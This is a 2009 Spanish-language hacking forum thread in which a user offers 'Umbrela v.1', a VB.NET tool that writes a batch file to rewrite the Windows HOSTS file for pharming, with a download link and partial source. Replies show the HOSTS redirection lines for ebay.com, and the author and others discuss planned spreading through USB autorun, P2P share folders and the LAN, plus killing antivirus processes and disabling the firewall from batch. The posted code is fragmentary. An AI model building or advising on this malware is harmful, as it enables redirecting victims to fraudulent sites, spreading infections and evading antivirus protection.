Páginas: [1] 2 
|
 |
|
 Autor
|
Tema: Umbrela v.1 (pharming) (herramienta arreglada 23/6/09) (Leído 1697 veces)
|
Spanishat
 Desconectado
Mensajes: 201
Alias polloesponja - Registro:16 Noviembre 2008
|
Umbrela,programado por spanishat=polloesponja softwares. Este programa crea un archivo en .bat que cambia la ip de la pagina que visitas.Y la pone como pagina principal en internet explorer. Ejemplo: pones www.ebay.es y la ip de una pagina porno , resultado: escribe en navegador: www.ebay.esy sale una página porno (para mas información buscar en ask o google sobre pharming) Imagen:  Descargar: http://www.megaupload.com/?d=4BI89U90como estamos en analisis y diseño de malware os dejo el form1 para quien quiera aprender o robarme el code (pero con amistad) Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
My.Computer.FileSystem.WriteAllText(Application.StartupPath & "\umbrela-Creacion.bat", TextBox10.Text & vbCrLf & TextBox3.Text & " " & TextBox2.Text & " " & TextBox1.Text & " " & ">>" & TextBox4.Text & vbCrLf & "exit" & vbCrLf, True)
End Sub
Private Sub TextBox9_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox8.TextChanged
WTF JAJA
End Sub
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
My.Computer.FileSystem.WriteAllText(Application.StartupPath & "\umbrela-Creacion.bat", TextBox10.Text & vbCrLf & TextBox6.Text & MaskedTextBox1.Text & TextBox1.Text & MaskedTextBox1.Text & TextBox8.Text & vbCrLf, True)
End Sub
End Class Quien quiera saber el contenido de los texbox que maximize el programa UMBRELA v.1 comentar por favor, :alaba: |
|
|
|
« Última modificación: 05 Julio 2009, 14:22 por polloesponja software »
|
En línea
|
|
|
|
|
BlackZeroX▓▓▒▒░░
|
lo habitual es solo agregas mas lineas al archivo Host, que habialmente es este: # Copyright (c) 1993-1999 Microsoft Corp.
#
# Questo è un esempio di file HOSTS usato da Microsoft TCP/IP per Windows.
#
# Questo file contiene la mappatura degli indirizzi IP ai nomi host.
# Ogni voce dovrebbe occupare una singola riga. L'indirizzo IP dovrebbe
# trovarsi nella prima colonna seguito dal nome host corrispondente.
# L'indirizzo e il nome host dovrebbero essere separati da almeno uno spazio
# o punto di tabulazione.
#
# È inoltre possibile inserire commenti (come questi) nelle singole righe
# o dopo il nome del computer caratterizzato da un simbolo '#'.
#
# Per esempio:
#
# 102.54.94.97 rhino.acme.com # server origine
# 38.25.63.10 x.acme.com # client host x
127.0.0.1 localhost
y para solo poner una DNS a otra ip se pone digamos esto: 127.0.0.1 localhost
www.ebay.com 63.246.146.120
ebay.com 63.246.146.120
NO es vdd xP P.D.: el archivo esta en: c:\windows\system32\drivers\etc\HOSTS abrir con el block de notas y agregar tantas cuales quieran¡!, en ocasiones este archivo esta bloqueado por los antivirus y no es posible editarlo... al menos no de forma directa xP.¡! |
|
|
|
|
En línea
|
Servidor FTP Gratuito: Subir Archivos... Inicio -> Ejecutar Explorer FTP://infrangelux.sytes.net/ Para navegar en http://Infrangelux.sytes.net/ftp/No se aceptan archivos del tipo PHP, o con nombre index... Me Vale si otros creen en la Existencia de un Dios. The Dark Shadow is my passion. El infierno es mi Hogar, mi novia es Lilith y el metal m |
|
|
Spanishat
Desconectado
Mensajes: 201
Alias polloesponja - Registro:16 Noviembre 2008
|
Herramienta arreglada.
|
|
|
|
|
En línea
|
|
|
|
invisible_hack
Desconectado
Mensajes: 868
Invisible_Hack™ Nick Registrado =P
|
Jaja, pues muy original, no había visto herramientas de este tipo... Puede servir para gastar alguna que otra bromita  |
|
|
|
|
En línea
|
|
|
|
Spanishat
Desconectado
Mensajes: 201
Alias polloesponja - Registro:16 Noviembre 2008
|
V.2 en contrucción  Puede que algunas funciones sean sustituidas por otras o simplemente nunca publique la v2. |
|
|
|
« Última modificación: 30 Junio 2009, 00:36 por polloesponja software »
|
En línea
|
|
|
|
dropper
Desconectado
Mensajes: 1.917
Nothing to prove
|
Mmm me interesa tu proyecto...
Con respecto a la propagación... Podrías explicar como funciona?
Digamos... Ahora ejecuto tu programa en mi PC, y el pharming se produciría en toda mi red? y con respecto a la propagación P2P?
|
|
|
|
|
En línea
|
|
|
|
YST
Desconectado
Mensajes: 940
I'm you
|
Seguramente es un copy paste la propagación por LAN del modulo de MadAntrax es como lo hace la mayoria de la gente a si que revisalo  . |
|
|
|
|
En línea
|
  Yo le enseñe a Kayser a usar objetos en ASM |
|
|
Darioxhcx
Desconectado
Mensajes: 1.617
|
Jaja, pues muy original, no había visto herramientas de este tipo... Puede servir para gastar alguna que otra bromita .__. xD pero terminas haciendo un .bat.. solo que con interfaz va digo.. es como vivir usando system() en si la aplicacion.. la idea no es muy buena.. osea , la tecnica es buena pero ya esta muy gastada en lo que es malware... pero bue linda interfaz un saludo |
|
|
|
|
En línea
|
|
|
|
|
|
Spanishat
Desconectado
Mensajes: 201
Alias polloesponja - Registro:16 Noviembre 2008
|
Por cierto en win 7 ( y supongo que en vista ) no anda tu tool Gracias por la info Jaja, pues muy original, no había visto herramientas de este tipo... Puede servir para gastar alguna que otra bromita .__. xD pero terminas haciendo un .bat.. solo que con interfaz va digo.. es como vivir usando system() en si la aplicacion.. la idea no es muy buena.. osea , la tecnica es buena pero ya esta muy gastada en lo que es malware... pero bue linda interfaz un saludo Jaja, porque acabe en .exe no va a ser mejor, es mas sencillo añadir opciones que hacer un codigo de nuevo  Gracias por la crítica. |
|
|
|
« Última modificación: 29 Junio 2009, 23:11 por polloesponja software »
|
En línea
|
|
|
|
Spanishat
Desconectado
Mensajes: 201
Alias polloesponja - Registro:16 Noviembre 2008
|
Mmm me interesa tu proyecto...
Con respecto a la propagación... Podrías explicar como funciona?
Digamos... Ahora ejecuto tu programa en mi PC, y el pharming se produciría en toda mi red? y con respecto a la propagación P2P?
Pues lo de p2p seria autocopiarse en las típicas carpetas de ares,emule etc... Lo de la lan seria enviar a los usuarios, pero aun nose si tendrá esas funciones, es un futuro si las pongo te aviso. la usb ya la tengo preparada Modificación: puede que cambie infectar toda la lan, por: infectar todas las cuentas del sistema operativo del pc. Modificación2:queda mucho tiempo para que lo termine :s |
|
|
|
« Última modificación: 03 Julio 2009, 21:40 por polloesponja software »
|
En línea
|
|
|
|
1112815
Desconectado
Mensajes: 21
|
Para practicar está bien, pero ten en cuenta que lo único que has hecho es una linea que modifique host.
Consejos mios (es decir, super básicos, porque soy un n00b en todo esto):
-Muchos usuarios tienen restringido el acceso a host, tendrías que hacerlo como superusuario
-El autorun de los pendrives esta fichadisimo por los antivirus de hoy en día
-Ya que estás en batch, incluye algunas lineas para matar procesos de antiviruses, a lo mejor ayuda
-No uses batch para esto xD
|
|
|
|
|
En línea
|
|
|
|
Spanishat
Desconectado
Mensajes: 201
Alias polloesponja - Registro:16 Noviembre 2008
|
Para practicar está bien, pero ten en cuenta que lo único que has hecho es una linea que modifique host.
Consejos mios (es decir, super básicos, porque soy un n00b en todo esto):
-Muchos usuarios tienen restringido el acceso a host, tendrías que hacerlo como superusuario
-El autorun de los pendrives esta fichadisimo por los antivirus de hoy en día
-Ya que estás en batch, incluye algunas lineas para matar procesos de antiviruses, a lo mejor ayuda
-No uses batch para esto xD
Una linea que modifica el host de todos lo usuarios del S.O windows, que modifica la que infecte por usb y la de la gente que lo descargue por algunos p2p y que esa simple linea crea mucha inseguridad si le das un mal uso. -Un autorun es un archivo normal y corriente , no solo sirve para infectar a la gente y no es detectado como malicioso, o eso creo, cuando usaba nod32 no me decía nada con los autoruns.(nose si me equivoco) -Puedes dar tus razones para no usar batch? No entiendo porque descriminais al pobre batch xD -Pensé lo de matar procesos, tengo una pequeña lista para añadir pero no quería que tubiese tantas opciones, aunque a lo mejor cambio la opción de usuarios infectados por la de matar procesos de antivirus pero nosenose. Gracias por tu aporte  aportaré tambien a tus proyectos, si esque tienes, si quieres colabrorar en umbrela v.2 y me esneñas a pasarlo a exe y todo eso que criticas envia mensaje por mp, o si tienes algo tuyo que cres que ayude, te pondré en agradecimientos. |
|
|
|
« Última modificación: 03 Julio 2009, 21:36 por polloesponja software »
|
En línea
|
|
|
|
1112815
Desconectado
Mensajes: 21
|
Pss... lo digo pero lo repito, soy muy novato (por no decir que no tengo ni idea) en esto. Lo único que he hecho son probar programas y hacer el lammer por ahi, a ver si empiezo a programar una vez.
El caso es que por experiencia propia, como tu has dicho, el nod32 no bloquea mucho los autoruns, pero en pcs mas "publicos" escuelas, librerias... los autorun que tengan cualquier ejecutable al inicio los cancelan al momento. Para que te hagas una idea, el año pasado metí un pendrive a mi instituto, y nada más meterlo, el norton me dijo "Hacktool detected: cain.exe", y ni siquiera tenía autorun, simplemente lo tenía en una carpeta por ahi guardado.
Porque digo que cambies batch? porque es lo que yo uso y la verdad, dependes mucho del usuario que lo ejecute y las condiciones del equipo. De todas formas me parece acojonante que puedas desactivar el firewall con batch y que al antivirus se la sude.
(yo uso batch xD)
|
|
|
|
|
En línea
|
|
|
|
Spanishat
Desconectado
Mensajes: 201
Alias polloesponja - Registro:16 Noviembre 2008
|
Tranquilo yo tampoco soy un profesional estoy tambien como tu, seria mas por el cain que por el autorun xD,si necesitas algo de info que yo sepa me tienes aqui.
|
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 2 
|
|
|
 |
"Si no visitas mi blog, Chuck te dará una patada giratoria"
![WWW](data:text/html,<img src="http://img199.imageshack.us/img199/7002/norris.gif" />;http://)
